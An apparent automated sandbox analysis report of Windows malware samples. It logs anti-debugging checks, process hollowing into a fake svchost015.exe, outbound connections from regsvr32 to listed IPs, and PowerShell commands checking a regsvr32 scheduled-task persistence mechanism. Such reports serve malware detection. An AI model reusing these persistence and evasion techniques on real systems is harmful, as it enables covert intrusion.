                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeAPI call chain: ExitProcess graph end nodegraph_3-6727
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeAPI call chain: ExitProcess graph end nodegraph_5-61745
                    Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Found API chain indicative of debugger detection
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_5-61490
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_100057B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_100057B0
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02D9E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,5_2_02D9E6BE
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_004502AC
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_100097BA GetProcessHeap,1_2_100097BA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_10002AF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10002AF3
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_100057B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_100057B0
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_10002FEE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_10002FEE
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02D980E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_02D980E8
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_02779A6B SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlen,ExitProcess,GetTempPathA,lstrcpy,lstrcat,lstrcat,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpy,lstrlen,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,lstrcat,lstrcat,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlen,StartServiceCtrlDispatcherA,GetLastError,Sleep,CreateThread,WSAStartup,CreateThread,Sleep,10_2_02779A6B

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 194.87.98.18 443Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 67.195.204.77 25Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 52.101.41.22 25Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeMemory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5AJump to behavior
                    Sample uses process hollowing technique
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeSection unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000Jump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41C000Jump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 429000Jump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000Jump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeMemory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42C000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,4_2_00478420
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe "C:\Users\user\Desktop\nK8noQeiXl.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpProcess created: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENTJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_02777809 GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,10_2_02777809
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,4_2_0042E0AC
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_100031B8 cpuid 1_2_100031B8
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: GetLocaleInfoA,3_2_004051FC
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: GetLocaleInfoA,3_2_00405248
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: GetLocaleInfoA,4_2_00408570
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: GetLocaleInfoA,4_2_004085BC
                    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeQueries volume information: C:\ VolumeInformation
